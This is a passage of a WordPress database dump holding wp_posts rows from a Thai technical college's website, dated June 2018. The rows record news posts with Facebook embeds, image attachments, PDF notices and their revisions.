(3155, 3, '2018-06-21 14:29:23', '2018-06-21 07:29:23', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598414730534719%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมประชุมกับบริษัท สมาร์ท(2015) เซอร์วิสเซส จำกัด และสำนักงานคณะกรรมการนโยบายวิทยาศาสตร์ เทคโนโลยีและนวัตกรรมแห่งชาติ (สวทน.) เพื่อปรึกษาหารือการจัดแผนปฏิบัติการกับทุกฝ่ายในโครงการ WiL ร่วมกับวิทยาลัยเทคนิคระยอง ในวันที่ 14 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97-%e0%b8%aa%e0%b8%a1%e0%b8%b2', '', '', '2018-06-21 14:30:42', '2018-06-21 07:30:42', '', 0, 'http://www.technicrayong.ac.th/?p=3155', 385, 'post', '', 0),
(3156, 3, '2018-06-21 14:28:56', '2018-06-21 07:28:56', '', '35240484_255186431896938_1400791158250012672_o', '', 'inherit', 'closed', 'closed', '', '35240484_255186431896938_1400791158250012672_o', '', '', '2018-06-21 14:28:56', '2018-06-21 07:28:56', '', 3155, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35240484_255186431896938_1400791158250012672_o.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3157, 3, '2018-06-21 14:29:23', '2018-06-21 07:29:23', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598414730534719%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมประชุมกับบริษัท สมาร์ท(2015) เซอร์วิสเซส จำกัด และสำนักงานคณะกรรมการนโยบายวิทยาศาสตร์ เทคโนโลยีและนวัตกรรมแห่งชาติ (สวทน.) เพื่อปรึกษาหารือการจัดแผนปฏิบัติการกับทุกฝ่ายในโครงการ WiL ร่วมกับวิทยาลัยเทคนิคระยอง ในวันที่ 14 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3155-revision-v1', '', '', '2018-06-21 14:29:23', '2018-06-21 07:29:23', '', 3155, 'http://www.technicrayong.ac.th/3155-revision-v1/', 0, 'revision', '', 0),
(3158, 3, '2018-06-21 14:29:34', '2018-06-21 07:29:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598414730534719%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมประชุมกับบริษัท สมาร์ท(2015) เซอร์วิสเซส จำกัด และสำนักงานคณะกรรมการนโยบายวิทยาศาสตร์ เทคโนโลยีและนวัตกรรมแห่งชาติ (สวทน.) เพื่อปรึกษาหารือการจัดแผนปฏิบัติการกับทุกฝ่ายในโครงการ WiL ร่วมกับวิทยาลัยเทคนิคระยอง ในวันที่ 14 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3155-autosave-v1', '', '', '2018-06-21 14:29:34', '2018-06-21 07:29:34', '', 3155, 'http://www.technicrayong.ac.th/3155-autosave-v1/', 0, 'revision', '', 0),
(3159, 3, '2018-06-21 14:36:54', '2018-06-21 07:36:54', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D599212317121627%26id%3D100010985913485&width=500\" width=\"500\" height=\"746\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมกับบริษัท วิสดอมไวด์ จำกัด สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา จัดโครงการฝึกอบรมพัฒนาทักษะภาษาอังกฤษเพื่อก้าวสู่อาชีพสำหรับนักเรียน นักศึกษา รุ่นที่ 57-59 ในระหว่างวันที่ 15, 18-19 มิถุนายน 2561 โดยมีนักเรียนนักศึกษาเข้าร่วม 200 คน', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97-%e0%b8%a7%e0%b8%b4%e0%b8%aa%e0%b8%94%e0%b8%ad%e0%b8%a1%e0%b9%84%e0%b8%a7%e0%b8%94', '', '', '2018-06-21 14:36:54', '2018-06-21 07:36:54', '', 0, 'http://www.technicrayong.ac.th/?p=3159', 384, 'post', '', 0),
(3160, 3, '2018-06-21 14:36:17', '2018-06-21 07:36:17', '', '35296521_599206813788844_7136563829932032000_o', '', 'inherit', 'closed', 'closed', '', '35296521_599206813788844_7136563829932032000_o', '', '', '2018-06-21 14:36:17', '2018-06-21 07:36:17', '', 3159, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35296521_599206813788844_7136563829932032000_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3161, 3, '2018-06-21 14:36:54', '2018-06-21 07:36:54', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D599212317121627%26id%3D100010985913485&width=500\" width=\"500\" height=\"746\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมกับบริษัท วิสดอมไวด์ จำกัด สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา จัดโครงการฝึกอบรมพัฒนาทักษะภาษาอังกฤษเพื่อก้าวสู่อาชีพสำหรับนักเรียน นักศึกษา รุ่นที่ 57-59 ในระหว่างวันที่ 15, 18-19 มิถุนายน 2561 โดยมีนักเรียนนักศึกษาเข้าร่วม 200 คน', '', 'inherit', 'closed', 'closed', '', '3159-revision-v1', '', '', '2018-06-21 14:36:54', '2018-06-21 07:36:54', '', 3159, 'http://www.technicrayong.ac.th/3159-revision-v1/', 0, 'revision', '', 0),
(3162, 3, '2018-06-21 14:37:04', '2018-06-21 07:37:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D599212317121627%26id%3D100010985913485&width=500\" width=\"500\" height=\"746\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมกับบริษัท วิสดอมไวด์ จำกัด สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา จัดโครงการฝึกอบรมพัฒนาทักษะภาษาอังกฤษเพื่อก้าวสู่อาชีพสำหรับนักเรียน นักศึกษา รุ่นที่ 57-59 ในระหว่างวันที่ 15, 18-19 มิถุนายน 2561 โดยมีนักเรียนนักศึกษาเข้าร่วม 200 คน', '', 'inherit', 'closed', 'closed', '', '3159-autosave-v1', '', '', '2018-06-21 14:37:04', '2018-06-21 07:37:04', '', 3159, 'http://www.technicrayong.ac.th/3159-autosave-v1/', 0, 'revision', '', 0),
(3163, 3, '2018-06-21 14:40:17', '2018-06-21 07:40:17', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D602414316801427%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมกับมูลนิธิจิตเป็นผู้ให้ ใจเป็นนิพพาน จัดโครงการอบรมคุณธรรม จริยธรรมให้นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ปรับเปลี่ยนแนวคิด(Mindset) ของตนให้มีวินัย โดยพันเอกนายแพทย์พงศ์ศักดิ์ ตั้งคณา และคณะ ณ โรงแรมสตาร์ จังหวัดระยอง วันอังคารที่ 19 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b4%e0%b8%98%e0%b8%b4%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b9%80%e0%b8%9b%e0%b9%87%e0%b8%99%e0%b8%9c', '', '', '2018-06-21 14:40:17', '2018-06-21 07:40:17', '', 0, 'http://www.technicrayong.ac.th/?p=3163', 383, 'post', '', 0),
(3164, 3, '2018-06-21 14:39:49', '2018-06-21 07:39:49', '', '35240050_602410910135101_4953681177442516992_o', '', 'inherit', 'closed', 'closed', '', '35240050_602410910135101_4953681177442516992_o', '', '', '2018-06-21 14:39:49', '2018-06-21 07:39:49', '', 3163, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35240050_602410910135101_4953681177442516992_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3165, 3, '2018-06-21 14:40:17', '2018-06-21 07:40:17', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D602414316801427%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมกับมูลนิธิจิตเป็นผู้ให้ ใจเป็นนิพพาน จัดโครงการอบรมคุณธรรม จริยธรรมให้นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ปรับเปลี่ยนแนวคิด(Mindset) ของตนให้มีวินัย โดยพันเอกนายแพทย์พงศ์ศักดิ์ ตั้งคณา และคณะ ณ โรงแรมสตาร์ จังหวัดระยอง วันอังคารที่ 19 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3163-revision-v1', '', '', '2018-06-21 14:40:17', '2018-06-21 07:40:17', '', 3163, 'http://www.technicrayong.ac.th/3163-revision-v1/', 0, 'revision', '', 0),
(3166, 3, '2018-06-21 14:40:27', '2018-06-21 07:40:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D602414316801427%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมกับมูลนิธิจิตเป็นผู้ให้ ใจเป็นนิพพาน จัดโครงการอบรมคุณธรรม จริยธรรมให้นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ปรับเปลี่ยนแนวคิด(Mindset) ของตนให้มีวินัย โดยพันเอกนายแพทย์พงศ์ศักดิ์ ตั้งคณา และคณะ ณ โรงแรมสตาร์ จังหวัดระยอง วันอังคารที่ 19 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3163-autosave-v1', '', '', '2018-06-21 14:40:27', '2018-06-21 07:40:27', '', 3163, 'http://www.technicrayong.ac.th/3163-autosave-v1/', 0, 'revision', '', 0),
(3167, 3, '2018-06-21 14:42:30', '2018-06-21 07:42:30', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D603074790068713%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท SCG เข้ามอบทุนการศึกษา ให้แก่นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ที่ผ่านการสัมภาษณ์ทุนการศึกษาของมูลนิธิ SCG และทุนการศึกษาของ Excellent Model School จำนวน 24 ทุน รวมเป็นเงินทั้งสิ้น 365,000 บาท วันพุธที่ 20 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97-scg-%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a1%e0%b8%ad%e0%b8%9a%e0%b8%97%e0%b8%b8%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8%e0%b8%b6', '', '', '2018-06-21 14:42:30', '2018-06-21 07:42:30', '', 0, 'http://www.technicrayong.ac.th/?p=3167', 382, 'post', '', 0),
(3168, 3, '2018-06-21 14:41:51', '2018-06-21 07:41:51', '', '35552190_603055720070620_4596052994599944192_o', '', 'inherit', 'closed', 'closed', '', '35552190_603055720070620_4596052994599944192_o', '', '', '2018-06-21 14:41:51', '2018-06-21 07:41:51', '', 3167, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35552190_603055720070620_4596052994599944192_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3169, 3, '2018-06-21 14:42:30', '2018-06-21 07:42:30', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D603074790068713%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท SCG เข้ามอบทุนการศึกษา ให้แก่นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ที่ผ่านการสัมภาษณ์ทุนการศึกษาของมูลนิธิ SCG และทุนการศึกษาของ Excellent Model School จำนวน 24 ทุน รวมเป็นเงินทั้งสิ้น 365,000 บาท วันพุธที่ 20 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3167-revision-v1', '', '', '2018-06-21 14:42:30', '2018-06-21 07:42:30', '', 3167, 'http://www.technicrayong.ac.th/3167-revision-v1/', 0, 'revision', '', 0),
(3170, 3, '2018-06-21 14:42:40', '2018-06-21 07:42:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D603074790068713%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท SCG เข้ามอบทุนการศึกษา ให้แก่นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ที่ผ่านการสัมภาษณ์ทุนการศึกษาของมูลนิธิ SCG และทุนการศึกษาของ Excellent Model School จำนวน 24 ทุน รวมเป็นเงินทั้งสิ้น 365,000 บาท วันพุธที่ 20 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3167-autosave-v1', '', '', '2018-06-21 14:42:40', '2018-06-21 07:42:40', '', 3167, 'http://www.technicrayong.ac.th/3167-autosave-v1/', 0, 'revision', '', 0),
(3171, 3, '2018-06-21 14:48:02', '2018-06-21 07:48:02', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.604070779969114.1073742141.100010985913485&type=3\"><img class=\"aligncenter wp-image-3172 size-full\" src=\"/wp-content/uploads/2018/06/6-20-2018-11-43-01-PM.png\" alt=\"\" width=\"612\" height=\"881\" /></a>', 'วันพฤหัสบดีที่ 21 มิถุนายน 2561 วิทยาลัยเทคนิคระยอง จัดพิธีไหว้ครูขึ้น เพื่อให้นักเรียน นักศึกษาได้แสดงความเคารพ และระลึกถึงพระคุณครู ครูผู้ประสิทธิ์วิชาความรู้ทำให้เราสามารถนำไปประกอบวิชาชีพ สร้างความเจริญรุ่งเรืองให้แก่ตนเอง และครอบครัวได้ในอนาคต ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-21-%e0%b8%a1%e0%b8%b4%e0%b8%96%e0%b8%b8%e0%b8%99%e0%b8%b2%e0%b8%a2', '', '', '2018-06-21 14:48:02', '2018-06-21 07:48:02', '', 0, 'http://www.technicrayong.ac.th/?p=3171', 381, 'post', '', 0),
(3172, 3, '2018-06-21 14:46:32', '2018-06-21 07:46:32', '', '6-20-2018 11-43-01 PM', '', 'inherit', 'closed', 'closed', '', '6-20-2018-11-43-01-pm', '', '', '2018-06-21 14:46:32', '2018-06-21 07:46:32', '', 3171, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/6-20-2018-11-43-01-PM.png', 0, 'attachment', 'image/png', 0),
(3173, 3, '2018-06-21 14:47:34', '2018-06-21 07:47:34', '', '35924276_604082353301290_2762178413920780288_o', '', 'inherit', 'closed', 'closed', '', '35924276_604082353301290_2762178413920780288_o', '', '', '2018-06-21 14:47:34', '2018-06-21 07:47:34', '', 3171, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35924276_604082353301290_2762178413920780288_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3174, 3, '2018-06-21 14:48:02', '2018-06-21 07:48:02', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.604070779969114.1073742141.100010985913485&type=3\"><img class=\"aligncenter wp-image-3172 size-full\" src=\"/wp-content/uploads/2018/06/6-20-2018-11-43-01-PM.png\" alt=\"\" width=\"612\" height=\"881\" /></a>', 'วันพฤหัสบดีที่ 21 มิถุนายน 2561 วิทยาลัยเทคนิคระยอง จัดพิธีไหว้ครูขึ้น เพื่อให้นักเรียน นักศึกษาได้แสดงความเคารพ และระลึกถึงพระคุณครู ครูผู้ประสิทธิ์วิชาความรู้ทำให้เราสามารถนำไปประกอบวิชาชีพ สร้างความเจริญรุ่งเรืองให้แก่ตนเอง และครอบครัวได้ในอนาคต ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3171-revision-v1', '', '', '2018-06-21 14:48:02', '2018-06-21 07:48:02', '', 3171, 'http://www.technicrayong.ac.th/3171-revision-v1/', 0, 'revision', '', 0),
(3175, 3, '2018-06-21 14:48:13', '2018-06-21 07:48:13', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.604070779969114.1073742141.100010985913485&type=3\"><img class=\"aligncenter wp-image-3172 size-full\" src=\"/wp-content/uploads/2018/06/6-20-2018-11-43-01-PM.png\" alt=\"\" width=\"612\" height=\"881\" /></a>', 'วันพฤหัสบดีที่ 21 มิถุนายน 2561 วิทยาลัยเทคนิคระยอง จัดพิธีไหว้ครูขึ้น เพื่อให้นักเรียน นักศึกษาได้แสดงความเคารพ และระลึกถึงพระคุณครู ครูผู้ประสิทธิ์วิชาความรู้ทำให้เราสามารถนำไปประกอบวิชาชีพ สร้างความเจริญรุ่งเรืองให้แก่ตนเอง และครอบครัวได้ในอนาคต ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3171-autosave-v1', '', '', '2018-06-21 14:48:13', '2018-06-21 07:48:13', '', 3171, 'http://www.technicrayong.ac.th/3171-autosave-v1/', 0, 'revision', '', 0),
(3176, 3, '2018-06-21 15:25:31', '2018-06-21 08:25:31', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%99%E0%B8%A3-%E0%B8%99%E0%B8%A8-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B9%80%E0%B8%99%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%88%E0%B8%B2%E0%B8%81%E0%B8%82%E0%B8%B2%E0%B8%94%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%80%E0%B8%81%E0%B8%B4%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B9%88%E0%B8%B2-15-%E0%B8%A7%E0%B8%B1%E0%B8%99-1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดเรียนเกินกว่า 15 วันติดต่อกัน และไม่ลงทะเบียน ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8-3', '', '', '2018-06-21 15:55:45', '2018-06-21 08:55:45', '', 0, 'http://www.technicrayong.ac.th/?p=3176', 380, 'post', '', 0),
(3178, 3, '2018-06-21 15:25:31', '2018-06-21 08:25:31', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%99%E0%B8%A3-%E0%B8%99%E0%B8%A8-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B9%80%E0%B8%99%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%88%E0%B8%B2%E0%B8%81%E0%B8%82%E0%B8%B2%E0%B8%94%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%80%E0%B8%81%E0%B8%B4%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B9%88%E0%B8%B2-15-%E0%B8%A7%E0%B8%B1%E0%B8%99-1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดเรียนเกินกว่า 15 วันติดต่อกัน และไม่ลงทะเบียน ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3176-revision-v1', '', '', '2018-06-21 15:25:31', '2018-06-21 08:25:31', '', 3176, 'http://www.technicrayong.ac.th/3176-revision-v1/', 0, 'revision', '', 0),
(3179, 3, '2018-06-21 15:55:54', '2018-06-21 08:55:54', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%99%E0%B8%A3-%E0%B8%99%E0%B8%A8-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B9%80%E0%B8%99%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%88%E0%B8%B2%E0%B8%81%E0%B8%82%E0%B8%B2%E0%B8%94%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B9%80%E0%B8%81%E0%B8%B4%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B9%88%E0%B8%B2-15-%E0%B8%A7%E0%B8%B1%E0%B8%99-1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดเรียนเกินกว่า 15 วันติดต่อกัน และไม่ลงทะเบียน ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3176-autosave-v1', '', '', '2018-06-21 15:55:54', '2018-06-21 08:55:54', '', 3176, 'http://www.technicrayong.ac.th/3176-autosave-v1/', 0, 'revision', '', 0),
(3180, 3, '2018-06-21 16:06:29', '2018-06-21 09:06:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D604243966618462%26id%3D100010985913485&width=500\" width=\"500\" height=\"702\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ชมรมแม่บ้านมหาดไทยจังหวัดระยอง ตรวจเยี่ยม นายวิทวัส แย้มกลิ่น นักเรียนมูลนิธิร่วมจิตต์น้อมเกล้าฯ เพื่อเยาวชน ในพระบรมราชินูปถัมภ์ วันพฤหัสบดีที่ 21 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%8a%e0%b8%a1%e0%b8%a3%e0%b8%a1%e0%b9%81%e0%b8%a1%e0%b9%88%e0%b8%9a%e0%b9%89%e0%b8%b2%e0%b8%99%e0%b8%a1%e0%b8%ab%e0%b8%b2%e0%b8%94%e0%b9%84%e0%b8%97%e0%b8%a2%e0%b8%88%e0%b8%b1%e0%b8%87%e0%b8%ab', '', '', '2018-06-21 16:08:13', '2018-06-21 09:08:13', '', 0, 'http://www.technicrayong.ac.th/?p=3180', 379, 'post', '', 0),
(3181, 3, '2018-06-21 16:05:58', '2018-06-21 09:05:58', '', '35761525_604240736618785_4388481709130121216_o', '', 'inherit', 'closed', 'closed', '', '35761525_604240736618785_4388481709130121216_o', '', '', '2018-06-21 16:05:58', '2018-06-21 09:05:58', '', 3180, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35761525_604240736618785_4388481709130121216_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3182, 3, '2018-06-21 16:06:29', '2018-06-21 09:06:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D604243966618462%26id%3D100010985913485&width=500\" width=\"500\" height=\"702\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ชมรมแม่บ้านมหาดไทยจังหวัดระยอง ตรวจเยี่ยม นายวิทวัส แย้มกลิ่น นักเรียนมูลนิธิร่วมจิตต์น้อมเกล้าฯ เพื่อเยาวชน ในพระบรมราชินูปถัมภ์ วันพฤหัสบดีที่ 21 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3180-revision-v1', '', '', '2018-06-21 16:06:29', '2018-06-21 09:06:29', '', 3180, 'http://www.technicrayong.ac.th/3180-revision-v1/', 0, 'revision', '', 0),
(3183, 3, '2018-06-21 16:08:22', '2018-06-21 09:08:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D604243966618462%26id%3D100010985913485&width=500\" width=\"500\" height=\"702\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ชมรมแม่บ้านมหาดไทยจังหวัดระยอง ตรวจเยี่ยม นายวิทวัส แย้มกลิ่น นักเรียนมูลนิธิร่วมจิตต์น้อมเกล้าฯ เพื่อเยาวชน ในพระบรมราชินูปถัมภ์ วันพฤหัสบดีที่ 21 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3180-autosave-v1', '', '', '2018-06-21 16:08:22', '2018-06-21 09:08:22', '', 3180, 'http://www.technicrayong.ac.th/3180-autosave-v1/', 0, 'revision', '', 0),
(3184, 3, '2018-06-22 09:59:29', '2018-06-22 02:59:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B4%E0%B8%88-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์การศึกษา แผนกคอมพิวเตอร์ธุรกิจ จำนวน 3 รายการ', '', 'publish', 'closed', 'open', '', 